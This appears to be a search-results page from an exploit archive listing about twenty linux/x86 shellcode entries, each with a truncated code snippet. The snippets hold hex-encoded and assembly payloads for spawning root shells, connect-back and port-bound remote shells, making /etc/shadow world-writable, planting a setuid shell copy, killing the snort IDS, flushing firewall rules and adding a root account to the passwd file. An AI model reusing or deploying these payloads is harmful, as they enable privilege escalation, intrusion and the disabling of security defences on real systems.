45 matches found
linux/x86 execve /bin/sh (encoded by +1) 39 bytes
Exploit for linux/x86 platform in category shellcode ================================================= linux/x86 execve /bin/sh encoded by +1 39 bytes ================================================= / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik / char shellcod...
linux/x86 quick (yet conditional, eax != 0 and edx == 0) exit 4 bytes
Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 quick yet conditional, eax != 0 and edx == 0 exit 4 bytes ===================================================================== / linux/x86 quick yet conditional, e...
linux/x86 normal exit with random so to speak return value 5 bytes
linux/x86 normal exit w/ random so to speak return value 5 bytes. Shellcode exploit for linx86 platform / linux/x86 normal exit w/ random so to speak return value - 5 bytes - izik / char shellcode = "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80"; // int $0x80 int mainint argc, char arg...
linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes
Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes =================================================== / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char...
linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes
No description provided by source. / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" /...
linux/x86 eject cd-rom (follows /dev/cdrom symlink) + exit() 40 bytes
Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes ===================================================================== / linux/x86 eject cd-rom follows...
linux/x86 dup20,0; dup20,1; dup20,2; 15 bytes
linux/x86 dup20,0; dup20,1; dup20,2; 15 bytes. Shellcode exploit for linx86 platform / dup2loop-core.c by Charles Stevenson I made this as a chunk you can paste in to make modular remote exploits. I usually combine this with an execve as the second stage of a read jmp %esp / char hellcode = /...
linux/x86 connect 120 bytes
Exploit for linux/x86 platform in category shellcode =========================== linux/x86 connect 120 bytes =========================== / Connecting shellcode written by lamagra http://lamagra.seKure.de May 2000 .file "connect" .version "01.01" .text .align 4 start:...
linux/x86 ipchains -F 49 bytes
Exploit for linux/x86 platform in category shellcode ============================== linux/x86 ipchains -F 49 bytes ============================== include include / asm" sub $0x4,%esp Con esto conseguimos que la shellcode nunca se popl %esp sobreescriba... gracias RaiSe : xorl %edx,%edx %edx a cer...
linux/x86 chmod 666 /etc/shadow 82 bytes
Exploit for linux/x86 platform in category shellcode ======================================== linux/x86 chmod 666 /etc/shadow 82 bytes ======================================== / email protected Usando execve y un array de punteros include main char name4; name0="/bin/chmod"; name1="666";...
linux/x86 cp /bin/sh /tmp/katy ; chmod 4555 katy 126 bytes
Exploit for linux/x86 platform in category shellcode ========================================================== linux/x86 cp /bin/sh /tmp/katy ; chmod 4555 katy 126 bytes ========================================================== / Linux/x86 /bin/cp /bin/sh /tmp/katy ; chmod 4555 /tmp/sh using fo...
linux/x86 kill snort 151 bytes
No description provided by source. / x86 linux "snort IDS" shutter shellcode size 151 By nob0dy // find your own reality / / char snortshuttershellcode = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff" "\xff\x83\xc6\x0d\x31\xc9\xb1\x80\x80" "\x36\x01\x46\xe2\xfa\xea\x18\x2e\x74"...
linux/x86 shared memory exec 50 bytes
linux/x86 shared memory exec 50 bytes. Shellcode exploit for linx86 platform / [email protected] - http://www.nopninjas.com Platform: Linux x86 Length: 50 bytes - This shellcode connects to the shared memory segment matching the key and executes the code at that address. xorl %edi,%edi xorl...
linux/x86 connect 120 bytes
linux/x86 connect 120 bytes. Shellcode exploit for linx86 platform / Connecting shellcode written by lamagra http://lamagra.seKure.de May 2000 .file "connect" .version "01.01" .text .align 4 start: socketAFINET,SOCKSTREAM,IPPROTOIP; movl %esp,%ebp xorl %edx,%edx movb $102,%edx movl %edx,%eax 102 ...
linux/x86 execve /bin/sh 29 bytes
linux/x86 execve /bin/sh 29 bytes. Shellcode exploit for linx86 platform / c1999-2003 Shellcode Research http://www.shellcode.com.ar execve/bin/sh for linux x86 29 bytes by Matias Sedalo xorl %ebx, %ebx pushl %ebx leal 0x17%ebx,%eax int $0x80 cdq pushl $0x68732f6e pushl $0x69622f2f movl %esp, %eb...
linux/x86 execve /bin/sh tolower() evasion 41 bytes
Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 execve /bin/sh tolower evasion 41 bytes =================================================== / Linux/x86 tolower evasion, execve /bin/sh eg use: various qpop exploits / include char...
linux/x86 portbind port 5074 + fork 130 bytes
linux/x86 portbind port 5074 + fork 130 bytes. Shellcode exploit for linx86 platform / [email protected] 0x9abril0x7d2 syssocketcall 102 0x66 %eax, esta es nuestra rutina principal. En todas las subrutinas vamos a necesitar a: %eax = 0x66. Luego del archivo include/linux/net.h obtenemos l...
linux/x86 bsd/x86 execve /bin/sh 38 bytes
linux/x86 bsd/x86 execve /bin/sh 38 bytes. Shellcode exploits for multiple platform / Linux/x86 and Bsd/x86 execve of /bin/sh by dymitri!!! / include char code = "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x50" "\x54" "\x53" "\x50" "\x8c\xe0" "\x21\xc0" "\x74\x04"...
linux/x86 execve /bin/sh tolower() evasion 41 bytes
No description provided by source. / Linux/x86 tolower evasion, execve /bin/sh eg use: various qpop exploits / include stdio.h char c0de = / main: / "\xeb\x1b" / jmp callz / / start: / "\x5e" / popl %esi / "\x89\xf3" / movl %esi, %ebx / "\x89\xf7" / movl %esi, %edi / "\x83\xc7\x07" / addl $0x07,...
linux/x86 add user 104 bytes
linux/x86 add user 104 bytes. Shellcode exploit for linx86 platform / Source to this is pass.s This will append a root line to the passwd file see the source. Shok Matt Conover, [email protected] / char shellcode= "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb"...